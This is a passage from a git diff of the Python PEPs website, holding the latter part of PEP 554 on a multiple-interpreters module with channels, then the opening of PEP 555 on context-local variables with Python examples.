To make this work, the mutable shared state will be managed by the +Python runtime, not by any of the interpreters. Initially we will +support only one type of objects for shared state: the channels provided +by interpreters.create_channel(). Channels, in turn, will carefully +manage passing objects between interpreters.

+

This approach, including keeping the API minimal, helps us avoid further +exposing any underlying complexity to Python users.

+

The interpreters module provides the following function related +to channels:

+
create_channel() -> (RecvChannel, SendChannel):
+
+   Create a new channel and return (recv, send), the RecvChannel
+   and SendChannel corresponding to the ends of the channel.
+
+   Both ends of the channel are supported "shared" objects (i.e.
+   may be safely shared by different interpreters.  Thus they
+   may be set using "Interpreter.set_main_attrs()".
+
+
+

The module also provides the following channel-related classes:

+
class RecvChannel(id):
+
+   The receiving end of a channel.  An interpreter may use this to
+   receive objects from another interpreter.  Any type supported by
+   Interpreter.set_main_attrs() will be supported here, though at
+   first only a few of the simple, immutable builtin types
+   will be supported.
+
+   id -> int:
+
+      The channel's unique ID.  The "send" end has the same one.
+
+   recv(*, timeout=None):
+
+      Return the next object from the channel.  If none have been
+      sent then wait until the next send (or until the timeout is hit).
+
+      At the least, the object will be equivalent to the sent object.
+      That will almost always mean the same type with the same data,
+      though it could also be a compatible proxy.  Regardless, it may
+      use a copy of that data or actually share the data.  That's up
+      to the object's type.
+
+   recv_nowait(default=None):
+
+      Return the next object from the channel.  If none have been
+      sent then return the default.  Otherwise, this is the same
+      as the "recv()" method.
+
+
+class SendChannel(id):
+
+   The sending end of a channel.  An interpreter may use this to
+   send objects to another interpreter.  Any type supported by
+   Interpreter.set_main_attrs() will be supported here, though
+   at first only a few of the simple, immutable builtin types
+   will be supported.
+
+   id -> int:
+
+      The channel's unique ID.  The "recv" end has the same one.
+
+   send(obj, *, timeout=None):
+
+      Send the object (i.e. its data) to the "recv" end of the
+      channel.  Wait until the object is received.  If the object
+      is not shareable then ValueError is raised.
+
+      The builtin memoryview is supported, so sending a buffer
+      across involves first wrapping the object in a memoryview
+      and then sending that.
+
+   send_nowait(obj):
+
+      Send the object to the "recv" end of the channel.  This
+      behaves the same as "send()", except for the waiting part.
+      If no interpreter is currently receiving (waiting on the
+      other end) then queue the object and return False.  Otherwise
+      return True.
+
+
+
+
+

Caveats For Shared Objects

+

Again, Python objects are not shared between interpreters. +However, in some cases data those objects wrap is actually shared +and not just copied. One example might be PEP 3118 buffers.

+

In those cases the object in the original interpreter is kept alive +until the shared data in the other interpreter is no longer used. +Then object destruction can happen like normal in the original +interpreter, along with the previously shared data.

+
+
+
+

Documentation

+

The new stdlib docs page for the interpreters module will include +the following:

+
    +
  • (at the top) a clear note that support for multiple interpreters +is not required from extension modules
  • +
  • some explanation about what subinterpreters are
  • +
  • brief examples of how to use multiple interpreters +(and communicating between them)
  • +
  • a summary of the limitations of using multiple interpreters
  • +
  • (for extension maintainers) a link to the resources for ensuring +multiple interpreters compatibility
  • +
  • much of the API information in this PEP
  • +
+

Docs about resources for extension maintainers already exist on the +Isolating Extension Modules howto page. Any +extra help will be added there. For example, it may prove helpful +to discuss strategies for dealing with linked libraries that keep +their own subinterpreter-incompatible global state.

+

Note that the documentation will play a large part in mitigating any +negative impact that the new interpreters module might have on +extension module maintainers.

+

Also, the ImportError for incompatible extension modules will be +updated to clearly say it is due to missing multiple interpreters +compatibility and that extensions are not required to provide it. This +will help set user expectations properly.

+
+
+

Alternative Solutions

+

One possible alternative to a new module is to add support for interpreters +to concurrent.futures. There are several reasons why that wouldn’t work:

+
    +
  • the obvious place to look for multiple interpreters support +is an “interpreters” module, much as with “threading”, etc.
  • +
  • concurrent.futures is all about executing functions +but currently we don’t have a good way to run a function +from one interpreter in another
  • +
+

Similar reasoning applies for support in the multiprocessing module.

+
+
+

Open Questions

+
    +
  • will is be too confusing that interp.exec() runs in the current thread?
  • +
  • should we add pickling fallbacks right now for interp.exec(), and/or +Interpreter.set_main_attrs() and Interpreter.get_main_attr()?
  • +
  • should we support (limited) functions in interp.exec() right now?
  • +
  • rename Interpreter.close() to Interpreter.destroy()?
  • +
  • drop Interpreter.get_main_attr(), since we have channels?
  • +
  • should channels be its own PEP?
  • +
+
+
+

Deferred Functionality

+

In the interest of keeping this proposal minimal, the following +functionality has been left out for future consideration. Note that +this is not a judgement against any of said capability, but rather a +deferment. That said, each is arguably valid.

+
+

Add convenience API

+

There are a number of things I can imagine would smooth out +hypothetical rough edges with the new module:

+
    +
  • add something like Interpreter.run() or Interpreter.call() +that calls interp.exec() and falls back to pickle
  • +
  • fall back to pickle in Interpreter.set_main_attrs() +and Interpreter.get_main_attr()
  • +
+

These would be easy to do if this proves to be a pain point.

+
+
+

Avoid possible confusion about interpreters running in the current thread

+

One regular point of confusion has been that Interpreter.exec() +executes in the current OS thread, temporarily blocking the current +Python thread. It may be worth doing something to avoid that confusion.

+

Some possible solutions for this hypothetical problem:

+
    +
  • by default, run in a new thread?
  • +
  • add Interpreter.exec_in_thread()?
  • +
  • add Interpreter.exec_in_current_thread()?
  • +
+

In earlier versions of this PEP the method was interp.run(). +The simple change to interp.exec() alone will probably reduce +confusion sufficiently, when coupled with educating users via +the docs. It it turns out to be a real problem, we can pursue +one of the alternatives at that point.

+
+
+

Clarify “running” vs. “has threads”

+

Interpreter.is_running() refers specifically to whether or not +Interpreter.exec() (or similar) is running somewhere. It does not +say anything about if the interpreter has any subthreads running. That +information might be helpful.

+

Some things we could do:

+
    +
  • rename Interpreter.is_running() to Interpreter.is_running_main()
  • +
  • add Interpreter.has_threads(), to complement Interpreter.is_running()
  • +
  • expand to Interpreter.is_running(main=True, threads=False)
  • +
+

None of these are urgent and any could be done later, if desired.

+
+
+

A Dunder Method For Sharing

+

We could add a special method, like __xid__ to correspond to tp_xid. +At the very least, it would allow Python types to convert their instances +to some other type that implements tp_xid.

+

The problem is that exposing this capability to Python code presents +a degree of complixity that hasn’t been explored yet, nor is there +a compelling case to investigate that complexity.

+
+
+

Interpreter.call()

+

It would be convenient to run existing functions in subinterpreters +directly. Interpreter.exec() could be adjusted to support this or +a call() method could be added:

+
Interpreter.call(f, *args, **kwargs)
+
+
+

This suffers from the same problem as sharing objects between +interpreters via queues. The minimal solution (running a source string) +is sufficient for us to get the feature out where it can be explored.

+
+
+

Interpreter.run_in_thread()

+

This method would make a interp.exec() call for you in a thread. +Doing this using only threading.Thread and interp.exec() is +relatively trivial so we’ve left it out.

+
+
+

Synchronization Primitives

+

The threading module provides a number of synchronization primitives +for coordinating concurrent operations. This is especially necessary +due to the shared-state nature of threading. In contrast, +interpreters do not share state. Data sharing is restricted to the +runtime’s shareable objects capability, which does away with the need +for explicit synchronization. If any sort of opt-in shared state +support is added to CPython’s interpreters in the future, that same +effort can introduce synchronization primitives to meet that need.

+
+
+

CSP Library

+

A csp module would not be a large step away from the functionality +provided by this PEP. However, adding such a module is outside the +minimalist goals of this proposal.

+
+
+

Syntactic Support

+

The Go language provides a concurrency model based on CSP, +so it’s similar to the concurrency model that multiple interpreters +support. However, Go also provides syntactic support, as well as +several builtin concurrency primitives, to make concurrency a +first-class feature. Conceivably, similar syntactic (and builtin) +support could be added to Python using interpreters. However, +that is way outside the scope of this PEP!

+
+
+

Multiprocessing

+

The multiprocessing module could support interpreters in the same +way it supports threads and processes. In fact, the module’s +maintainer, Davin Potts, has indicated this is a reasonable feature +request. However, it is outside the narrow scope of this PEP.

+
+
+

C-extension opt-in/opt-out

+

By using the PyModuleDef_Slot introduced by PEP 489, we could +easily add a mechanism by which C-extension modules could opt out of +multiple interpreter support. Then the import machinery, when operating +in a subinterpreter, would need to check the module for support. +It would raise an ImportError if unsupported.

+

Alternately we could support opting in to multiple interpreters support. +However, that would probably exclude many more modules (unnecessarily) +than the opt-out approach. Also, note that PEP 489 defined that an +extension’s use of the PEP’s machinery implies multiple interpreters +support.

+

The scope of adding the ModuleDef slot and fixing up the import +machinery is non-trivial, but could be worth it. It all depends on +how many extension modules break under subinterpreters. Given that +there are relatively few cases we know of through mod_wsgi, we can +leave this for later.

+
+
+

Poisoning channels

+

CSP has the concept of poisoning a channel. Once a channel has been +poisoned, any send() or recv() call on it would raise a special +exception, effectively ending execution in the interpreter that tried +to use the poisoned channel.

+

This could be accomplished by adding a poison() method to both ends +of the channel. The close() method can be used in this way +(mostly), but these semantics are relatively specialized and can wait.

+
+
+

Resetting __main__

+

As proposed, every call to Interpreter.exec() will execute in the +namespace of the interpreter’s existing __main__ module. This means +that data persists there between interp.exec() calls. Sometimes +this isn’t desirable and you want to execute in a fresh __main__. +Also, you don’t necessarily want to leak objects there that you aren’t +using any more.

+

Note that the following won’t work right because it will clear too much +(e.g. __name__ and the other “__dunder__” attributes:

+
interp.exec('globals().clear()')
+
+
+

Possible solutions include:

+
    +
  • a create() arg to indicate resetting __main__ after each +interp.exec() call
  • +
  • an Interpreter.reset_main flag to support opting in or out +after the fact
  • +
  • an Interpreter.reset_main() method to opt in when desired
  • +
  • importlib.util.reset_globals() [reset_globals]
  • +
+

Also note that resetting __main__ does nothing about state stored +in other modules. So any solution would have to be clear about the +scope of what is being reset. Conceivably we could invent a mechanism +by which any (or every) module could be reset, unlike reload() +which does not clear the module before loading into it.

+

Regardless, since __main__ is the execution namespace of the +interpreter, resetting it has a much more direct correlation to +interpreters and their dynamic state than does resetting other modules. +So a more generic module reset mechanism may prove unnecessary.

+

This isn’t a critical feature initially. It can wait until later +if desirable.

+
+
+

Resetting an interpreter’s state

+

It may be nice to re-use an existing subinterpreter instead of +spinning up a new one. Since an interpreter has substantially more +state than just the __main__ module, it isn’t so easy to put an +interpreter back into a pristine/fresh state. In fact, there may +be parts of the state that cannot be reset from Python code.

+

A possible solution is to add an Interpreter.reset() method. This +would put the interpreter back into the state it was in when newly +created. If called on a running interpreter it would fail (hence the +main interpreter could never be reset). This would likely be more +efficient than creating a new interpreter, though that depends on +what optimizations will be made later to interpreter creation.

+

While this would potentially provide functionality that is not +otherwise available from Python code, it isn’t a fundamental +functionality. So in the spirit of minimalism here, this can wait. +Regardless, I doubt it would be controversial to add it post-PEP.

+
+
+

Copy an existing interpreter’s state

+

Relatedly, it may be useful to support creating a new interpreter +based on an existing one, e.g. Interpreter.copy(). This ties +into the idea that a snapshot could be made of an interpreter’s memory, +which would make starting up CPython, or creating new interpreters, +faster in general. The same mechanism could be used for a +hypothetical Interpreter.reset(), as described previously.

+
+
+

Shareable file descriptors and sockets

+

Given that file descriptors and sockets are process-global resources, +making them shareable is a reasonable idea. They would be a good +candidate for the first effort at expanding the supported shareable +types. They aren’t strictly necessary for the initial API.

+
+
+

Integration with async

+

Per Antoine Pitrou [async]:

+
Has any thought been given to how FIFOs could integrate with async
+code driven by an event loop (e.g. asyncio)?  I think the model of
+executing several asyncio (or Tornado) applications each in their
+own subinterpreter may prove quite interesting to reconcile multi-
+core concurrency with ease of programming.  That would require the
+FIFOs to be able to synchronize on something an event loop can wait
+on (probably a file descriptor?).
+
+
+

The basic functionality of multiple interpreters support does not depend +on async and can be added later.

+

A possible solution is to provide async implementations of the blocking +channel methods (recv(), and send()).

+

Alternately, “readiness callbacks” could be used to simplify use in +async scenarios. This would mean adding an optional callback +(kw-only) parameter to the recv_nowait() and send_nowait() +channel methods. The callback would be called once the object was sent +or received (respectively).

+

(Note that making channels buffered makes readiness callbacks less +important.)

+
+
+

Support for iteration

+

Supporting iteration on RecvChannel (via __iter__() or +_next__()) may be useful. A trivial implementation would use the +recv() method, similar to how files do iteration. Since this isn’t +a fundamental capability and has a simple analog, adding iteration +support can wait until later.

+
+
+

Channel context managers

+

Context manager support on RecvChannel and SendChannel may be +helpful. The implementation would be simple, wrapping a call to +close() (or maybe release()) like files do. As with iteration, +this can wait.

+
+
+

Pipes and Queues

+

With the proposed object passing mechanism of “os.pipe()”, other similar +basic types aren’t strictly required to achieve the minimal useful +functionality of multiple interpreters. Such types include pipes +(like unbuffered channels, but one-to-one) and queues (like channels, +but more generic). See below in Rejected Ideas for more information.

+

Even though these types aren’t part of this proposal, they may still +be useful in the context of concurrency. Adding them later is entirely +reasonable. The could be trivially implemented as wrappers around +channels. Alternatively they could be implemented for efficiency at the +same low level as channels.

+
+
+

Return a lock from send()

+

When sending an object through a channel, you don’t have a way of knowing +when the object gets received on the other end. One way to work around +this is to return a locked threading.Lock from SendChannel.send() +that unlocks once the object is received.

+

Alternately, the proposed SendChannel.send() (blocking) and +SendChannel.send_nowait() provide an explicit distinction that is +less likely to confuse users.

+

Note that returning a lock would matter for buffered channels +(i.e. queues). For unbuffered channels it is a non-issue.

+
+
+

Support prioritization in channels

+

A simple example is queue.PriorityQueue in the stdlib.

+
+
+

Support inheriting settings (and more?)

+

Folks might find it useful, when creating a new interpreter, to be +able to indicate that they would like some things “inherited” by the +new interpreter. The mechanism could be a strict copy or it could be +copy-on-write. The motivating example is with the warnings module +(e.g. copy the filters).

+

The feature isn’t critical, nor would it be widely useful, so it +can wait until there’s interest. Notably, both suggested solutions +will require significant work, especially when it comes to complex +objects and most especially for mutable containers of mutable +complex objects.

+
+
+

Make exceptions shareable

+

Exceptions are propagated out of run() calls, so it isn’t a big +leap to make them shareable. However, as noted elsewhere, +it isn’t essential or (particularly common) so we can wait on doing +that.

+
+
+

Make everything shareable through serialization

+

We could use pickle (or marshal) to serialize everything and thus +make them shareable. Doing this is potentially inefficient, +but it may be a matter of convenience in the end. +We can add it later, but trying to remove it later +would be significantly more painful.

+
+
+

Make RunFailedError.__cause__ lazy

+

An uncaught exception in a subinterpreter (from interp.exec()) is +copied to the calling interpreter and set as __cause__ on a +RunFailedError which is then raised. That copying part involves +some sort of deserialization in the calling interpreter, which can be +expensive (e.g. due to imports) yet is not always necessary.

+

So it may be useful to use an ExceptionProxy type to wrap the +serialized exception and only deserialize it when needed. That could +be via ExceptionProxy__getattribute__() or perhaps through +RunFailedError.resolve() (which would raise the deserialized +exception and set RunFailedError.__cause__ to the exception.

+

It may also make sense to have RunFailedError.__cause__ be a +descriptor that does the lazy deserialization (and set __cause__) +on the RunFailedError instance.

+
+
+

Return a value from interp.exec()

+

Currently interp.exec() always returns None. One idea is to return +the return value from whatever the subinterpreter ran. However, for now +it doesn’t make sense. The only thing folks can run is a string of +code (i.e. a script). This is equivalent to PyRun_StringFlags(), +exec(), or a module body. None of those “return” anything. We can +revisit this once interp.exec() supports functions, etc.

+
+
+

Add a shareable synchronization primitive

+

This would be _threading.Lock (or something like it) where +interpreters would actually share the underlying mutex. The main +concern is that locks and isolated interpreters may not mix well +(as learned in Go).

+

We can add this later if it proves desirable without much trouble.

+
+
+

Propagate SystemExit and KeyboardInterrupt Differently

+

The exception types that inherit from BaseException (aside from +Exception) are usually treated specially. These types are: +KeyboardInterrupt, SystemExit, and GeneratorExit. It may +make sense to treat them specially when it comes to propagation from +interp.exec(). Here are some options:

+
* propagate like normal via RunFailedError
+* do not propagate (handle them somehow in the subinterpreter)
+* propagate them directly (avoid RunFailedError)
+* propagate them directly (set RunFailedError as __cause__)
+
+
+

We aren’t going to worry about handling them differently. Threads +already ignore SystemExit, so for now we will follow that pattern.

+
+
+

Add an explicit release() and close() to channel end classes

+

It can be convenient to have an explicit way to close a channel against +further global use. Likewise it could be useful to have an explicit +way to release one of the channel ends relative to the current +interpreter. Among other reasons, such a mechanism is useful for +communicating overall state between interpreters without the extra +boilerplate that passing objects through a channel directly would +require.

+

The challenge is getting automatic release/close right without making +it hard to understand. This is especially true when dealing with a +non-empty channel. We should be able to get by without release/close +for now.

+
+
+

Add SendChannel.send_buffer()

+

This method would allow no-copy sending of an object through a channel +if it supports the PEP 3118 buffer protocol (e.g. memoryview).

+

Support for this is not fundamental to channels and can be added on +later without much disruption.

+
+
+

Auto-run in a thread

+

The PEP proposes a hard separation between subinterpreters and threads: +if you want to run in a thread you must create the thread yourself and +call interp.exec() in it. However, it might be convenient if +interp.exec() could do that for you, meaning there would be less +boilerplate.

+

Furthermore, we anticipate that users will want to run in a thread much +more often than not. So it would make sense to make this the default +behavior. We would add a kw-only param “threaded” (default True) +to interp.exec() to allow the run-in-the-current-thread operation.

+
+
+
+

Rejected Ideas

+
+

Explicit channel association

+

Interpreters are implicitly associated with channels upon recv() and +send() calls. They are de-associated with release() calls. The +alternative would be explicit methods. It would be either +add_channel() and remove_channel() methods on Interpreter +objects or something similar on channel objects.

+

In practice, this level of management shouldn’t be necessary for users. +So adding more explicit support would only add clutter to the API.

+
+
+

Add an API based on pipes

+

A pipe would be a simplex FIFO between exactly two interpreters. For +most use cases this would be sufficient. It could potentially simplify +the implementation as well. However, it isn’t a big step to supporting +a many-to-many simplex FIFO via channels. Also, with pipes the API +ends up being slightly more complicated, requiring naming the pipes.

+
+
+

Add an API based on queues

+

Queues and buffered channels are almost the same thing. The main +difference is that channels have a stronger relationship with context +(i.e. the associated interpreter).

+

The name “Channel” was used instead of “Queue” to avoid confusion with +the stdlib queue.Queue.

+
+
+

“enumerate”

+

The list_all() function provides the list of all interpreters. +In the threading module, which partly inspired the proposed API, the +function is called enumerate(). The name is different here to +avoid confusing Python users that are not already familiar with the +threading API. For them “enumerate” is rather unclear, whereas +“list_all” is clear.

+
+
+

Alternate solutions to prevent leaking exceptions across interpreters

+

In function calls, uncaught exceptions propagate to the calling frame. +The same approach could be taken with interp.exec(). However, this +would mean that exception objects would leak across the inter-interpreter +boundary. Likewise, the frames in the traceback would potentially leak.

+

While that might not be a problem currently, it would be a problem once +interpreters get better isolation relative to memory management (which +is necessary to stop sharing the GIL between interpreters). We’ve +resolved the semantics of how the exceptions propagate by raising a +RunFailedError instead, for which __cause__ wraps a safe proxy +for the original exception and traceback.

+

Rejected possible solutions:

+
    +
  • reproduce the exception and traceback in the original interpreter +and raise that.
  • +
  • raise a subclass of RunFailedError that proxies the original +exception and traceback.
  • +
  • raise RuntimeError instead of RunFailedError
  • +
  • convert at the boundary (a la subprocess.CalledProcessError) +(requires a cross-interpreter representation)
  • +
  • support customization via Interpreter.excepthook +(requires a cross-interpreter representation)
  • +
  • wrap in a proxy at the boundary (including with support for +something like err.raise() to propagate the traceback).
  • +
  • return the exception (or its proxy) from interp.exec() instead of +raising it
  • +
  • return a result object (like subprocess does) [result-object] +(unnecessary complexity?)
  • +
  • throw the exception away and expect users to deal with unhandled +exceptions explicitly in the script they pass to interp.exec() +(they can pass error info out via channels); +with threads you have to do something similar
  • +
+
+
+

Always associate each new interpreter with its own thread

+

As implemented in the C-API, an interpreter is not inherently tied to +any thread. Furthermore, it will run in any existing thread, whether +created by Python or not. You only have to activate one of its thread +states (PyThreadState) in the thread first. This means that the +same thread may run more than one interpreter (though obviously +not at the same time).

+

The proposed module maintains this behavior. Interpreters are not +tied to threads. Only calls to Interpreter.exec() are. However, +one of the key objectives of this PEP is to provide a more +human-centric concurrency model. With that in mind, from a conceptual +standpoint the module might be easier to understand if each +interpreter were associated with its own thread.

+

That would mean interpreters.create() would create a new thread +and Interpreter.exec() would only execute in that thread (and +nothing else would). The benefit is that users would not have to +wrap Interpreter.exec() calls in a new threading.Thread. Nor +would they be in a position to accidentally pause the current +interpreter (in the current thread) while their interpreter +executes.

+

The idea is rejected because the benefit is small and the cost is high. +The difference from the capability in the C-API would be potentially +confusing. The implicit creation of threads is magical. The early +creation of threads is potentially wasteful. The inability to run +arbitrary interpreters in an existing thread would prevent some valid +use cases, frustrating users. Tying interpreters to threads would +require extra runtime modifications. It would also make the module’s +implementation overly complicated. Finally, it might not even make +the module easier to understand.

+
+
+

Only associate interpreters upon use

+

Associate interpreters with channel ends only once recv(), +send(), etc. are called.

+

Doing this is potentially confusing and also can lead to unexpected +races where a channel is auto-closed before it can be used in the +original (creating) interpreter.

+
+
+

Allow multiple simultaneous calls to Interpreter.exec()

+

This would make sense especially if Interpreter.exec() were to +manage new threads for you (which we’ve rejected). Essentially, +each call would run independently, which would be mostly fine +from a narrow technical standpoint, since each interpreter +can have multiple threads.

+

The problem is that the interpreter has only one __main__ module +and simultaneous Interpreter.exec() calls would have to sort out +sharing __main__ or we’d have to invent a new mechanism. Neither +would be simple enough to be worth doing.

+
+
+

Add a “reraise” method to RunFailedError

+

While having __cause__ set on RunFailedError helps produce a +more useful traceback, it’s less helpful when handling the original +error. To help facilitate this, we could add +RunFailedError.reraise(). This method would enable the following +pattern:

+
try:
+    try:
+        interp.exec(script)
+    except RunFailedError as exc:
+        exc.reraise()
+except MyException:
+    ...
+
+
+

This would be made even simpler if there existed a __reraise__ +protocol.

+

All that said, this is completely unnecessary. Using __cause__ +is good enough:

+
try:
+    try:
+        interp.exec(script)
+    except RunFailedError as exc:
+        raise exc.__cause__
+except MyException:
+    ...
+
+
+

Note that in extreme cases it may require a little extra boilerplate:

+
try:
+    try:
+        interp.exec(script)
+    except RunFailedError as exc:
+        if exc.__cause__ is not None:
+            raise exc.__cause__
+        raise  # re-raise
+except MyException:
+    ...
+
+
+
+
+
+

Implementation

+

The implementation of the PEP has 4 parts:

+
    +
  • the high-level module described in this PEP (mostly a light wrapper +around a low-level C extension
  • +
  • the low-level C extension module
  • +
  • additions to the internal C-API needed by the low-level module
  • +
  • secondary fixes/changes in the CPython runtime that facilitate +the low-level module (among other benefits)
  • +
+

These are at various levels of completion, with more done the lower +you go:

+
    +
  • the high-level module has been, at best, roughly implemented. +However, fully implementing it will be almost trivial.
  • +
  • the low-level module is mostly complete. The bulk of the +implementation was merged into master in December 2018 as the +“_xxsubinterpreters” module (for the sake of testing multiple +interpreters functionality). Only the exception propagation +implementation remains to be finished, which will not require +extensive work.
  • +
  • all necessary C-API work has been finished
  • +
  • all anticipated work in the runtime has been finished
  • +
+

The implementation effort for PEP 554 is being tracked as part of +a larger project aimed at improving multi-core support in CPython. +[multi-core-project]

+
+
+

References

+
+ + + + + + + + + + + + + + +
+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0554.rst

+

Last modified: 2023-11-28 02:32:35 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0555/index.html b/pep-0555/index.html new file mode 100644 index 00000000000..9600052504c --- /dev/null +++ b/pep-0555/index.html @@ -0,0 +1,534 @@ + + + + + + + + PEP 555 – Context-local variables (contextvars) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 555 – Context-local variables (contextvars)

+
+
Author:
+
Koos Zevenhoven
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
06-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
06-Sep-2017
+
+
+
+
Table of Contents +
+
+

Abstract

+

Sometimes, in special cases, it is desired that code can pass information down the function call chain to the callees without having to explicitly pass the information as arguments to each function in the call chain. This proposal describes a construct which allows code to explicitly switch in and out of a context where a certain context variable has a given value assigned to it. This is a modern alternative to some uses of things like global variables in traditional single-threaded (or thread-unsafe) code and of thread-local storage in traditional concurrency-unsafe code (single- or multi-threaded). In particular, the proposed mechanism can also be used with more modern concurrent execution mechanisms such as asynchronously executed coroutines, without the concurrently executed call chains interfering with each other’s contexts.

+

The “call chain” can consist of normal functions, awaited coroutines, or generators. The semantics of context variable scope are equivalent in all cases, allowing code to be refactored freely into subroutines (which here refers to functions, sub-generators or sub-coroutines) without affecting the semantics of context variables. Regarding implementation, this proposal aims at simplicity and minimum changes to the CPython interpreter and to other Python interpreters.

+
+
+

Rationale

+

Consider a modern Python call chain (or call tree), which in this proposal refers to any chained (nested) execution of subroutines, using any possible combinations of normal function calls, or expressions using await or yield from. In some cases, passing necessary information down the call chain as arguments can substantially complicate the required function signatures, or it can even be impossible to achieve in practice. In these cases, one may search for another place to store this information. Let us look at some historical examples.

+

The most naive option is to assign the value to a global variable or similar, where the code down the call chain can access it. However, this immediately makes the code thread-unsafe, because with multiple threads, all threads assign to the same global variable, and another thread can interfere at any point in the call chain. Sooner or later, someone will probably find a reason to run the same code in parallel threads.

+

A somewhat less naive option is to store the information as per-thread information in thread-local storage, where each thread has its own “copy” of the variable which other threads cannot interfere with. Although non-ideal, this has been the best solution in many cases. However, thanks to generators and coroutines, the execution of the call chain can be suspended and resumed, allowing code in other contexts to run concurrently. Therefore, using thread-local storage is concurrency-unsafe, because other call chains in other contexts may interfere with the thread-local variable.

+

Note that in the above two historical approaches, the stored information has the widest available scope without causing problems. For a third solution along the same path, one would first define an equivalent of a “thread” for asynchronous execution and concurrency. This could be seen as the largest amount of code and nested calls that is guaranteed to be executed sequentially without ambiguity in execution order. This might be referred to as concurrency-local or task-local storage. In this meaning of “task”, there is no ambiguity in the order of execution of the code within one task. (This concept of a task is close to equivalent to a Task in asyncio, but not exactly.) In such concurrency-locals, it is possible to pass information down the call chain to callees without another code path interfering with the value in the background.

+

Common to the above approaches is that they indeed use variables with a wide but just-narrow-enough scope. Thread-locals could also be called thread-wide globals—in single-threaded code, they are indeed truly global. And task-locals could be called task-wide globals, because tasks can be very big.

+

The issue here is that neither global variables, thread-locals nor task-locals are really meant to be used for this purpose of passing information of the execution context down the call chain. Instead of the widest possible variable scope, the scope of the variables should be controlled by the programmer, typically of a library, to have the desired scope—not wider. In other words, task-local variables (and globals and thread-locals) have nothing to do with the kind of context-bound information passing that this proposal intends to enable, even if task-locals can be used to emulate the desired semantics. Therefore, in the following, this proposal describes the semantics and the outlines of an implementation for context-local variables (or context variables, contextvars). In fact, as a side effect of this PEP, an async framework can use the proposed feature to implement task-local variables.

+
+
+

Proposal

+

Because the proposed semantics are not a direct extension to anything already available in Python, this proposal is first described in terms of semantics and API at a fairly high level. In particular, Python with statements are heavily used in the description, as they are a good match with the proposed semantics. However, the underlying __enter__ and __exit__ methods correspond to functions in the lower-level speed-optimized (C) API. For clarity of this document, the lower-level functions are not explicitly named in the definition of the semantics. After describing the semantics and high-level API, the implementation is described, going to a lower level.

+
+

Semantics and higher-level API

+
+

Core concept

+

A context-local variable is represented by a single instance of contextvars.Var, say cvar. Any code that has access to the cvar object can ask for its value with respect to the current context. In the high-level API, this value is given by the cvar.value property:

+
cvar = contextvars.Var(default="the default value",
+                       description="example context variable")
+
+assert cvar.value == "the default value"  # default still applies
+
+# In code examples, all ``assert`` statements should
+# succeed according to the proposed semantics.
+
+
+

No assignments to cvar have been applied for this context, so cvar.value gives the default value. Assigning new values to contextvars is done in a highly scope-aware manner:

+
with cvar.assign(new_value):
+    assert cvar.value is new_value
+    # Any code here, or down the call chain from here, sees:
+    #     cvar.value is new_value
+    # unless another value has been assigned in a
+    # nested context
+    assert cvar.value is new_value
+# the assignment of ``cvar`` to ``new_value`` is no longer visible
+assert cvar.value == "the default value"
+
+
+

Here, cvar.assign(value) returns another object, namely contextvars.Assignment(cvar, new_value). The essential part here is that applying a context variable assignment (Assignment.__enter__) is paired with a de-assignment (Assignment.__exit__). These operations set the bounds for the scope of the assigned value.

+

Assignments to the same context variable can be nested to override the outer assignment in a narrower context:

+
assert cvar.value == "the default value"
+with cvar.assign("outer"):
+    assert cvar.value == "outer"
+    with cvar.assign("inner"):
+        assert cvar.value == "inner"
+    assert cvar.value == "outer"
+assert cvar.value == "the default value"
+
+
+

Also multiple variables can be assigned to in a nested manner without affecting each other:

+
cvar1 = contextvars.Var()
+cvar2 = contextvars.Var()
+
+assert cvar1.value is None # default is None by default
+assert cvar2.value is None
+
+with cvar1.assign(value1):
+    assert cvar1.value is value1
+    assert cvar2.value is None
+    with cvar2.assign(value2):
+        assert cvar1.value is value1
+        assert cvar2.value is value2
+    assert cvar1.value is value1
+    assert cvar2.value is None
+assert cvar1.value is None
+assert cvar2.value is None
+
+
+

Or with more convenient Python syntax:

+
with cvar1.assign(value1), cvar2.assign(value2):
+    assert cvar1.value is value1
+    assert cvar2.value is value2
+
+
+

In another context, in another thread or otherwise concurrently executed task or code path, the context variables can have a completely different state. The programmer thus only needs to worry about the context at hand.

+
+
+

Refactoring into subroutines

+

Code using contextvars can be refactored into subroutines without affecting the semantics. For instance:

+
assi = cvar.assign(new_value)
+def apply():
+    assi.__enter__()
+assert cvar.value == "the default value"
+apply()
+assert cvar.value is new_value
+assi.__exit__()
+assert cvar.value == "the default value"
+
+
+

Or similarly in an asynchronous context where await expressions are used. The subroutine can now be a coroutine:

+
assi = cvar.assign(new_value)
+async def apply():
+    assi.__enter__()
+assert cvar.value == "the default value"
+await apply()
+assert cvar.value is new_value
+assi.__exit__()
+assert cvar.value == "the default value"
+
+
+

Or when the subroutine is a generator:

+
def apply():
+    yield
+    assi.__enter__()
+
+
+

which is called using yield from apply() or with calls to next or .send. This is discussed further in later sections.

+
+
+

Semantics for generators and generator-based coroutines

+

Generators, coroutines and async generators act as subroutines in much the same way that normal functions do. However, they have the additional possibility of being suspended by yield expressions. Assignment contexts entered inside a generator are normally preserved across yields:

+
def genfunc():
+    with cvar.assign(new_value):
+        assert cvar.value is new_value
+        yield
+        assert cvar.value is new_value
+g = genfunc()
+next(g)
+assert cvar.value == "the default value"
+with cvar.assign(another_value):
+    next(g)
+
+
+

However, the outer context visible to the generator may change state across yields:

+
def genfunc():
+    assert cvar.value is value2
+    yield
+    assert cvar.value is value1
+    yield
+    with cvar.assign(value3):
+        assert cvar.value is value3
+
+with cvar.assign(value1):
+    g = genfunc()
+    with cvar.assign(value2):
+        next(g)
+    next(g)
+    next(g)
+    assert cvar.value is value1
+
+
+

Similar semantics apply to async generators defined by async def ... yield ... ).

+

By default, values assigned inside a generator do not leak through yields to the code that drives the generator. However, the assignment contexts entered and left open inside the generator do become visible outside the generator after the generator has finished with a StopIteration or another exception:

+
assi = cvar.assign(new_value)
+def genfunc():
+    yield
+    assi.__enter__():
+    yield
+
+g = genfunc()
+assert cvar.value == "the default value"
+next(g)
+assert cvar.value == "the default value"
+next(g)  # assi.__enter__() is called here
+assert cvar.value == "the default value"
+next(g)
+assert cvar.value is new_value
+assi.__exit__()
